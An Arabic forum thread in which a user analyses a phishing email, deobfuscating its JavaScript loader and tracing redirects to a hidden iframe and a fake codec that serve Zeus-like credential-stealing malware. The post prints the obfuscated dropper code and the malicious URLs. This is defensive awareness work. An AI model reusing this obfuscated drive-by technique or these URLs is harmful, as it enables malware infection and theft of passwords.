|
الاختراق عن طريق البريد لإلكتروني..وجب الحذر..تحليل أمني
السلام عليكم ورحمة الله وبركاته
اليوم بينما كنت اتصفح بريدي الإلكتروني وجدت رسالة على البريد الوارد…الرسالة تطلب مني تحميل ملف مرفق و هو عبارة عن مقال في مستند PDF للوهلة الأولى ايقنت أن ان الرسالة مجرد فخ يقوم باستهوائي…لسبب بسيط هو انه لا يوجد اي علاقة بيني و بين الجهة المرسلة كما ان شكل العنوان يوحي بان في الموضوع “ان” و أخواتها كود PHP ---------------------------- Message original ---------------------------- Objet: PDF of JS article De: "Maude Gorman" Date: Lun 20 november 2010 21:21 -------------------------------------------------------------------------- see attached. -V 60488Journal Sentinel - Leka Obit.html الرسالة لم تعرف على انها سبام في بريد الهوتميل و هذا ما أثار فضولي لمعرفة المزيد الرسالة في شكل صفحة html قام بريد الهوتميل باخفاء محتواها…قمت بتعطيل الجافا سكربت في متصفحي و فتحت محتوى الصفحة لأعرف محتواها فوجدت كود جافا سكربت التالي: كود PHP <****** language="**********" type="text/**********">function aavk(u4zc){var fwag,qsv2="",xsln,cxzm,tkql=":;s\"xn0>uciqb/lo-em=afpv.t hr<",xtur=tkql.length;eval(unescape("%66un%63ti%6F n s%30k9%28uy%73e)**%71sv%32+=%75yse%7D"));for(fwag=0 ;fwag<u4zc.length;fwag++){cxzm=u4zc.charAt(fwag);x sln=tkql.indexOf(cxzm);if(xsln>-1){xsln-=(fwag+1)%xtur;if(xsln<0){xsln+=xtur;**s0k9(tkql.ch arAt(xsln));**else{s0k9(cxzm);****eval(unescape("%64o c%75me%6Et.w%72it%65(q%73v2)%3Bqs%762=%22%22;"));** aavk(":aa<tsx\"xsh<.ptc0fe>bai p<v>ln =u<.c/ceut;iciue;ssqaffo=l\"qif b.mi;nxrtochp");</******><no******>To display this page you need a browser that supports **********.</no******> كما تلاحظون فالكود عادي و ليس به ما يثير الريبة…لكنه مشفر…اذا دعونا نفك تشفيره وإضافة المسافة البادئة المناسبة بعد فك التشفير حصلت على التالي: كود PHP ********** function aavk(u4zc)** var fwag,qsv2="",xsln,cxzm,tkql=":;s\"xn0>uciqb/lo-em=afpv.t hr<",xtur=tkql.length; function s0k9(uyse)** qsv2+=uyse ** for(fwag=0;fwag<u4zc.length;fwag++)** cxzm=u4zc.charAt(fwag); xsln=tkql.indexOf(cxzm); if(xsln>-1)** xsln-=(fwag+1)%xtur; if(xsln<0)** xsln+=xtur; ** s0k9(tkql.charAt(xsln)); ** else{ s0k9(cxzm); ** ** ********.write(qsv2); qsv2=""; ** aavk(":aa<tsx\"xsh<.ptc0fe>bai p<v>ln =u<.c/ceut;iciue;ssqaffo=l\"qif b.mi;nxrtochp"); </******><no******>To display this page you need a browser that supports **********.</no******> يوجد لدينا الآن دالة رئيسية تحتوي على دالة ثانية تقوم بتحويل السلسة المدخلة الى رمز لتعرض في الأخير كود جافا سكربت مبهم نقوم بتعديل المستند .write عن طريق ***** لنشاهد الكود الذي يتم تحصيله كود PHP <**** **********="*******" *******="0;url=http://barrhavenbia.ca/x.html" /> اذا كود الجافا سكربت يقوم بتحويلنا الى رابط أول: http://barrhavenbia.ca/x.html به صفحة html غير مشفرة الصفحة تحتوي على الكود التالي: كود PHP PLEASE WAITING.... 4 SECONDS <****** width="0" height="0" src="http://finwizonline.com/news/"></******> <**** **********="*******" *******="4;url=http://xxxvideo-eyyc.cz.cc/video7/?afid=24" /> قمت بالبحث عن الدومين finwizonline.com في قوقل فكانت النتيجة التالية https://zeustracker.abuse.ch/monitor...72780bbe234546 (تم التبليغ عن الروابط و تم حجبها من قوقل و من فايرفوكس) تحليل الصفحة يظهر لنا ان رابط الدومين يحتوي على فايروس يحمل تلقائيا على الجهاز عن طريق كود جافا سكربت الفايروس موجود على المسار التالي /news/exe.exe قمت بتحميل الفايروس على سطح المكتب و رفعته على موقع virustotal فكانت النتيجة كالتالي: http://www.virustotal.com/file-scan/report.htm 7 برامج حماية فقط اعتبرت البرنامج كفايروس و البقية لم تتعرف عليه نمر للرابط الثاني http://xxxvideo-eyyc.cz.cc/video7/?afid=24 – هذا الرابط يحتوي على صفحة تطلب منا تحميل مشغل فيديو مفقود (codec) نقوم بتحميل الملف على سطح المكتب فنحصل على ملف تنفيذي codec.exe بأيقونة جميلة و كأنه فعلا برنامج كودك قمت بفحص الملف ايضا عن طريق موقع virustotal فكانت النتيجة التالية: http://www.virustotal.com/file-scan/report.html فقط 20 برنامج حماية اكتشف الفايروس الخطير في الأمر أن برامج جماية مدفوعة مثل McAfee و Symantec لم تتعرف عليه تحليل موقع Anubis على الرابط التالي http://anubis.iseclab.org/?action=re...4d&format=html بين لنا ان الملف عبارة عن malware مبرمج لاصطياد البيانات المخزنة على الجهاز مثل معلومات البريد الالكتروني و المسنجر و كلمات المرور المحفوظة بالمتصفح الفايروس يبدو و كانه فايروس زيوس المعروف الهجوم اعتمد طريقة التمويه حيث تم عن طريق تحميل برنامجين في رابطين مختلفين يتم التنقل بينهما تلقائيا…فالملفين مترابطين و يعملان معا الملف الاول يقوم بمهاجمة الانتي فايروس و تعطيله في حين ان الملف الثاني يقوم بتسجيل نفسه داخل بروسايس النظام ليعمل تلقائيا بمجرد تشغيلنا لجهاز الكمبيوتر…ثم يقوم بمراقبة جميع العمليات و تسجيلها و ارسالها لسرفر المهاجم الفايروس شبيه جدا بعمل تجميعة فايروس زيوس ..لذا دائما وجب علينا الحذر و الشك في كل الملفات و الروابط التي تصلنا على البريد الالكتروني و خاصة عندما تكون من مصادر نجهلها برامج الحماية ليست هي الحل…فالحل دائما في عقولنا و عيوننا …و على القول..لا تثق في اي شيئ على الانترنت مهما كان و كيف ما كان… |
بارك الله فيكم وجزاكم الله خير الجزاء
جعله الله في موازين حسناتكم |
واياكم بارك الله فيكم
وجزاكم خيرا شكرا على مروركم الطيب |
جزاكم الله خير ا
|
صدقا نحن بحاجة ماسة إلى تفكير ناقد ومتفحص في الاشياء
جزيت الجنة يا أخي ونقول قواك الله على تعلم هذا العلم علم التكنولوجيا أو الهكرز بالاحرى لخدمة المسلمين في كل مكان |
اكرمكم الله وزادكم من فضله
شكرا على مروركم الطيب فى رعاية الله وحفظه |
| الساعة الآن 06:33 PM |
Powered by vBulletin® Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
By Media Gate - https://mediagatejo.com